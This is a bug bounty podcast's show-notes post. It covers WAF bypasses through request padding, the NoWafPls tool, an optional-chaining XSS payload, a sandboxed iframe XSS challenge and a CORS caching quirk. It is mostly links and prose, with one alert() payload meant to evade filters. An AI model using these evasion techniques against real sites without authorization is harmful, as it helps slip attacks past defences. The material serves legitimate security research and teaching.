Critical Thinking - Bug Bounty Podcast
Posts
[HackerNotes Ep. 73] Sandboxed IFrames and WAF Bypasses

[HackerNotes Ep. 73] Sandboxed IFrames and WAF Bypasses

Content from NahamCon, WAF Bypasses, iFrame research and more!

gr3pme
June 01, 2024

Hacker TLDR;

WAF Bypasses: A new tool dropped by the Assetnote team ‘NoWafPls’ pads requests with junk data to bypass WAF inspection: https://github.com/assetnote/nowafpls. JavaScript’s optional chaining operator alert?.(1337,)?.() may also prove useful.
Programs Redacting Reports: Some programs have been silently redacting reports from hunters. It might be a good idea to create a cronjob or other means to back up your reports so you can view them later if this happens.
Exploiting iFrames: Johan Carlsson dropped an iFrame XSS challenge and released a solid blog post off of the back of the challenge covering a tonne of cool iFrame gadgets and behaviours: https://joaxcar.com/blog/2024/05/16/sandbox-iframe-xss-challenge-solution/.
- If you’re looking for more iFrame research to add to your arsenal, check this one out: https://blog.huli.tw/2022/04/07/en/iframe-and-window-open/
Clientside Extensions: If you’re looking for some extensions to aid in tracing sources and sinks and exploiting clientside bugs check out:
- Domloggerpp: https://github.com/kevin-mizu/domloggerpp
- Dom-invader: https://portswigger.net/burp/documentation/desktop/tools/dom-invader

WAF Bypasses

This week is a good week for some WAF bypass techniques. If you tuned into NahamCon over the weekend, Shubs and the team at Assetnote dropped a great talk on bypassing WAFs alongside a new tool. Check out the talk here https://www.youtube.com/watch?v=0OMmWtU2Y_g&ab_channel=NahamSec.

NoWafPls

NoWafPls essentially works by adding padding out requests. WAFs are sometimes configured to only process the first 8kb of a request (or more), using this tool you can add 8kb of junk and slip your payload in after:

https://github.com/assetnote/nowafpls

If you’re a Caido user, Justin dropped a Caido port for this here: https://gist.github.com/Rhynorater/ace68d4976357ca0937cb4669f303306

JavaScript Optional Chaining Operator

On a slightly related note, this JavaScript optional chaining operator might also be a useful tool in your arsenal to bypass WAFs. Original tweet here https://x.com/garethheyes/status/1786836956032176215 :

alert?.(1337,)?.()

Programs Redacting Reports

Some people in the community have been hit by report redactions on their own reports. This can be quite frustrating, especially if you’re looking back through old reports for payloads or to hit some bypasses. It might be worth taking backups of all reports (maybe via a cronjob, once a day/week) to make sure you can always view them if you ever need to.

Why some programs are doing this we aren’t sure, if you’d like to keep your finger on the pulse on this one check out the thread here: https://x.com/Rhynorater/status/1790476314635301352

Exploiting CORs * Origin

This one seems to have been patched now but keeping an eye out for strange behaviours like this can pay. From one of HackerScrolls old tweets (Check it out here https://x.com/MtnBer/status/1794657827115696181) there were some instances where the * origin in an access-control-allow-origin header could be exploited via Chromes caching functionality:

A good place to look for new features and behaviours that can lead to bugs like this is in the intent to ship channels here: https://groups.google.com/a/chromium.org/g/blink-dev - all new features that are being released and tested in the browser are documented and allow for public discussion. Equally, for all Critical Thinkers in the Critical Thinking Discord channel, an ‘Intent to ship’ channel exists for subscribers to easily track and keep updated.

Exploiting iFrames & Johan Sandbox iFrame XSS Challenge

You should be familiar with Johan Carlsson if you’re a regular listener of the pod. If you aren’t, Johan has somewhat of a speciality for finding pretty cool bugs on hardened targets like Gitlab and GitHub.

He dropped an iFrame XSS challenge a few weeks back. The challenge, taken from the blog ‘…The challenge page https://sandbox-iframe-ctf.glitch.me allows for arbitrary HTML in the search parameter xss as a Base64 encoded string. The HTML will be put inside a sandboxed iframe on the same page. The page will also add a flag to the hash portion of the URL upon visiting the site. The mission was to leak this flag in the hash and show the value in an alert box.’

If you’re looking for a good resource which explains the intricacy of CSPs, Iframes, sandboxing and how to exploit them, this writeup is for you: https://joaxcar.com/blog/2024/05/16/sandbox-iframe-xss-challenge-solution/

On a similar note, this blog contains a LOT of iFrame gadgets, tips, behaviours and quirks - these two resources alone should help you with a few exploits: https://blog.huli.tw/2022/04/07/en/iframe-and-window-open/

Clientside Extensions

Tracing sources and sinks clientside can sometimes be a headache. If you want to try some extensions to help you out on this endeavour, two potentials to note are domloggerpp and dom-invader. Domloggerpp seems to be more customizable (I’m yet still to use it) out of the two, and dom-invader has been baked into Burp’s default browser for some time now. Check them out below:

https://github.com/kevin-mizu/domloggerpp

https://portswigger.net/burp/documentation/desktop/tools/dom-invader

Till next time. Keep hacking!